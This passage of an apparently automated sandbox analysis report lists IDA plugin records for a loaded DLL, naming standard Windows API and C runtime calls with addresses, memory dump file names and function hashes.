                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,B8E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6D415DF2
                                                                                                      • __freea.LIBCMT ref: 6D415DFF
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • __freea.LIBCMT ref: 6D415E08
                                                                                                      • __freea.LIBCMT ref: 6D415E2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 2597970681-0
                                                                                                      • Opcode ID: 685d2b604f2a5768b17fa4e2678fdbc6601937c65301cc4177f2fc1a3d12f2eb
                                                                                                      • Instruction ID: e4ed50c7335bc9a4101f3c1b160381695539af2cb487ba1bee02141a5d68f482
                                                                                                      • Opcode Fuzzy Hash: 685d2b604f2a5768b17fa4e2678fdbc6601937c65301cc4177f2fc1a3d12f2eb
                                                                                                      • Instruction Fuzzy Hash: D6518072A18246AFEB118F64CC44EFB3BB9EB45754F22412AFD1496250EB31DC11CBA0
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6D4077E1
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D40780D
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6D40784C
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D407869
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6D4078A8
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D4078C5
                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D407907
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6D40792A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                      • String ID:
                                                                                                      • API String ID: 2040435927-0
                                                                                                      • Opcode ID: eea40a209ae063add139af9c3b51c48dc8539612d426557821a669abab3bb2db
                                                                                                      • Instruction ID: 65389e2082611a65033b94ee75a3d4cbc1c9b67bd2aa01815d4044e3536ed986
                                                                                                      • Opcode Fuzzy Hash: eea40a209ae063add139af9c3b51c48dc8539612d426557821a669abab3bb2db
                                                                                                      • Instruction Fuzzy Hash: 90518D72D0820AABEF119FA4CC84FAB3BB9EF45751F214439F914A6250D735DD11CBA1
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 8991baaed2229db3f21ce69ac684b56e06c660b1a64cfad7ec5163c4a2a24447
                                                                                                      • Instruction ID: ca979369cd6b7851e6ee3b871785ee7d719669fccf1e7131204353e60c0d025d
                                                                                                      • Opcode Fuzzy Hash: 8991baaed2229db3f21ce69ac684b56e06c660b1a64cfad7ec5163c4a2a24447
                                                                                                      • Instruction Fuzzy Hash: BB618D71918206AFDB11CF68CC41FBABBF5AB05720F2541BAEA54EB381E7709D41CB90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free_strpbrk
                                                                                                      • String ID: *?$.
                                                                                                      • API String ID: 3300345361-3972193922
                                                                                                      • Opcode ID: 4f3a13b63154981c547c0b54b89dd45079d4eaf67f61d3e24d3ac018cbef889a
                                                                                                      • Instruction ID: 3ad7025651ac38adb56c9f01c88bbd04e458e61c1b6c12b38f2266fbd6a03738
                                                                                                      • Opcode Fuzzy Hash: 4f3a13b63154981c547c0b54b89dd45079d4eaf67f61d3e24d3ac018cbef889a
                                                                                                      • Instruction Fuzzy Hash: CE612B75D0811A9FDB04CF98C8819EDFBF9FF48354B25816AD955A7300D732AE458B90
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • _free.LIBCMT ref: 6D41371B
                                                                                                      • _free.LIBCMT ref: 6D413732
                                                                                                      • _free.LIBCMT ref: 6D413751
                                                                                                      • _free.LIBCMT ref: 6D41376C
                                                                                                      • _free.LIBCMT ref: 6D413783
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$AllocHeap
                                                                                                      • String ID: e/Am
                                                                                                      • API String ID: 1835388192-3301751377
                                                                                                      • Opcode ID: 162b553dd3c6367985e7720a5badf47fcd03d14dd8ef001fbc7cd91f8fe7ced3
                                                                                                      • Instruction ID: 1f6e2b860cc93226367a84ad3315863d1ba9bb1eb00ba0e7694ccd9167f07c83
                                                                                                      • Opcode Fuzzy Hash: 162b553dd3c6367985e7720a5badf47fcd03d14dd8ef001fbc7cd91f8fe7ced3
                                                                                                      • Instruction Fuzzy Hash: DA51CDB1A08205ABDB10DF69CC45F7A77F8EF59724B1486ADE919DB250E731EE01CB80
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6D416A4D,00000008,00000001,00000020,0000002C,?), ref: 6D416303
                                                                                                      • __fassign.LIBCMT ref: 6D416382
                                                                                                      • __fassign.LIBCMT ref: 6D4163A1
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6D4163CE
                                                                                                      • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6D416A4D), ref: 6D4163EE
                                                                                                      • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6D416A4D), ref: 6D416428
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: 85b44e315fbf43f6044f6014f8c222e8a78d96af832111640541be33a9eb2377
                                                                                                      • Instruction ID: ed8a0923db9fe8173d1c3aa0e5109129358d72ec303e120baa342fc56e69392c
                                                                                                      • Opcode Fuzzy Hash: 85b44e315fbf43f6044f6014f8c222e8a78d96af832111640541be33a9eb2377
                                                                                                      • Instruction Fuzzy Hash: B7514A75A042499FDB10CFA9C881AEEBBF8EB09310F14852AE995E7251D730ED41CBA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 0-537541572
                                                                                                      • Opcode ID: 2bbcb893b7d4a80c15b2da528a3dfe21ec784b8a11a51f783d256785d18d4f58
                                                                                                      • Instruction ID: aa866f8ef69e7e0e368c1a45f99c75407e2b442604c0bada4ca1d2133e236aae
                                                                                                      • Opcode Fuzzy Hash: 2bbcb893b7d4a80c15b2da528a3dfe21ec784b8a11a51f783d256785d18d4f58
                                                                                                      • Instruction Fuzzy Hash: A5219971E4D216ABDB219A698D40F7A77789F0A7E8F220125ED1DA7341E730DD01C9E4
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41C86C: _free.LIBCMT ref: 6D41C891
                                                                                                      • _free.LIBCMT ref: 6D41CB70
                                                                                                        • Part of subcall function 6D411902: HeapFree.KERNEL32(00000000,00000000,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?), ref: 6D411918
                                                                                                        • Part of subcall function 6D411902: GetLastError.KERNEL32(?,?,6D41C896,?,00000000,?,00000000,?,6D41CB3B,?,00000007,?,?,6D41AB2E,?,?), ref: 6D41192A
                                                                                                      • _free.LIBCMT ref: 6D41CB7B
                                                                                                      • _free.LIBCMT ref: 6D41CB86
                                                                                                      • _free.LIBCMT ref: 6D41CBDA
                                                                                                      • _free.LIBCMT ref: 6D41CBE5
                                                                                                      • _free.LIBCMT ref: 6D41CBF0
                                                                                                      • _free.LIBCMT ref: 6D41CBFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 70fe10492864f6240c67e5798aa75d1082ba512e22f57dfde39e9f2a2523621b
                                                                                                      • Instruction ID: 26e93e3de21af211bc3601543d1c96fb625ef892e180fddf7ea54b906c25c67d
                                                                                                      • Opcode Fuzzy Hash: 70fe10492864f6240c67e5798aa75d1082ba512e22f57dfde39e9f2a2523621b
                                                                                                      • Instruction Fuzzy Hash: 44114F7194DB18AAE620EBB1DC86FEBB79C5F00B05F414C2DB3EAA6050DB65BD1486D0
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D41030E,?,?,6D4102D6,?,00000000), ref: 6D41037D
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D410390
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,6D41030E,?,?,6D4102D6,?,00000000), ref: 6D4103B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$Eh@m$mscoree.dll
                                                                                                      • API String ID: 4061214504-490442398
                                                                                                      • Opcode ID: e7df05a6a371dc220d5c2867c6b7716f66952e8c59cb8975c476cfbe04785153
                                                                                                      • Instruction ID: e6333df998c91a5c74d8101af8d00717af1f5ed8f994386c4902bf04f31b81f1
                                                                                                      • Opcode Fuzzy Hash: e7df05a6a371dc220d5c2867c6b7716f66952e8c59cb8975c476cfbe04785153
                                                                                                      • Instruction Fuzzy Hash: D2F03735A0560DBFDB11AB91CC08FBEBFB8EF49251F100169A909A2250DB318E50DA91
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404539
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D40455B
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D40457B
                                                                                                      • __Getctype.LIBCPMT ref: 6D404611
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404630
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404648
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                      • String ID:
                                                                                                      • API String ID: 1102183713-0
                                                                                                      • Opcode ID: 727a14f734b78109fd59ba7f13d1dc108cc459e5efdc0f2f4ad578ff4c3f0c0c
                                                                                                      • Instruction ID: 482b99b0a73f1a827530b6a652db8880b1bee72c21ba2bfbad2b8c24f914769e
                                                                                                      • Opcode Fuzzy Hash: 727a14f734b78109fd59ba7f13d1dc108cc459e5efdc0f2f4ad578ff4c3f0c0c
                                                                                                      • Instruction Fuzzy Hash: 5A41A971D042049BCB21DF58C540FAEB7B8EB18764F25416ED91AAB381EB30EE00CBD2
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000001,?,6D40A8B2,6D407FE9,6D407B61,?,6D407D99,?,00000001,?,?,00000001,?,6D42E010,0000000C,6D407E92), ref: 6D40A9AF
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D40A9BD
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D40A9D6
                                                                                                      • SetLastError.KERNEL32(00000000,6D407D99,?,00000001,?,?,00000001,?,6D42E010,0000000C,6D407E92,?,00000001,?), ref: 6D40AA28
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 7e24b7b7939ca418a0b6713925f6e34e5022b9f1b696df68fb6376ae72e72003
                                                                                                      • Instruction ID: dc3ae6bf2e1813182d93e1db0f3c24798f46408c5994b5fa5e6018cf86c4c123
                                                                                                      • Opcode Fuzzy Hash: 7e24b7b7939ca418a0b6713925f6e34e5022b9f1b696df68fb6376ae72e72003
                                                                                                      • Instruction Fuzzy Hash: 8601D83261E2125F961567756CC6F673774EF42B7D731023DE220456D0FF518C024694
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 1740715915-137412459
                                                                                                      • Opcode ID: 4167a942caefad81e13426784a6ae4ebfa055503b4c11de59cbce80fab875538
                                                                                                      • Instruction ID: 8825126fa46b9e44f776dcf4d9711136e5f67e8f68f55599951fd19655b6892d
                                                                                                      • Opcode Fuzzy Hash: 4167a942caefad81e13426784a6ae4ebfa055503b4c11de59cbce80fab875538
                                                                                                      • Instruction Fuzzy Hash: 02519D72A08606AFEB15DF64C942F7A77B6EF04314F25813EEA1587291E731EC81DB90
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,6D40BB03,00000000,?,00000001,00000000,?,6D40BB7A,00000001,FlsFree,6D422EC0,6D422EC8,00000000), ref: 6D40BAD2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                      • Opcode ID: 3f66ea468c34a30126ac2aadca6bfa4611da24d34fd0cef83bfc4a6da7cf497f
                                                                                                      • Instruction ID: d6f8ece07c48e97ac4191e50acfb0638bd9c1ff6654038c503df011fb5f6db39
                                                                                                      • Opcode Fuzzy Hash: 3f66ea468c34a30126ac2aadca6bfa4611da24d34fd0cef83bfc4a6da7cf497f
                                                                                                      • Instruction Fuzzy Hash: 3A118631E55622ABDB139B688C44F5A37B4AF02771F254131EA24E7380DB70ED008FD9
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D4049E6
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D404A06
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404A26
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D404AC1
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D404AD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 459529453-0
                                                                                                      • Opcode ID: e8d7379a9ee232e482bb843d20200d41c9bb05054a8f716988c9d6c1faa4007a
                                                                                                      • Instruction ID: e364695c9073c57d867a1fcd32bfaf7ec3b1dd343b902c9014d88ccd0ae79c2b
                                                                                                      • Opcode Fuzzy Hash: e8d7379a9ee232e482bb843d20200d41c9bb05054a8f716988c9d6c1faa4007a
                                                                                                      • Instruction Fuzzy Hash: C8418B71A042168BCB25CF99C480F6EBBB4FF55754F22416DD91AAB281DB30AE05CFD1
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6D424440,00000000,00000000,?,?,?,00000004,00000000,00000001,6D424440,0000007F,?,?), ref: 6D415B93
                                                                                                      • __alloca_probe_16.LIBCMT ref: 6D415BBC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6D415C08
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D415C1A
                                                                                                      • __freea.LIBCMT ref: 6D415C23
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 1857427562-0
                                                                                                      • Opcode ID: 48cf4ec2f08fa6bdea0a3bc3caa2e2e3eb993d92542d0d82282609d017b6265f
                                                                                                      • Instruction ID: 1792fbe9f60af2840a2b9e03adb617d2dffce70c893fd4d3f4b5f4d79c515da0
                                                                                                      • Opcode Fuzzy Hash: 48cf4ec2f08fa6bdea0a3bc3caa2e2e3eb993d92542d0d82282609d017b6265f
                                                                                                      • Instruction Fuzzy Hash: 9A31EF31A0820AABDB10DFA0DC84EFF7B79EF45310F154529E914AB250EB31CD51CBA0
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6D41A687
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D41A6AA
                                                                                                        • Part of subcall function 6D41193C: HeapAlloc.KERNEL32(00000000,?,?,?,6D408FF7,?,?,24448D6D,00000000,?,6D4012A7,?,?,?), ref: 6D41196E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D41A6D0
                                                                                                      • _free.LIBCMT ref: 6D41A6E3
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D41A6F2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2278895681-0
                                                                                                      • Opcode ID: 6a094c77072490cd3444e7da7943df1b310b506465ccc856fa0d3eb6ab9854e5
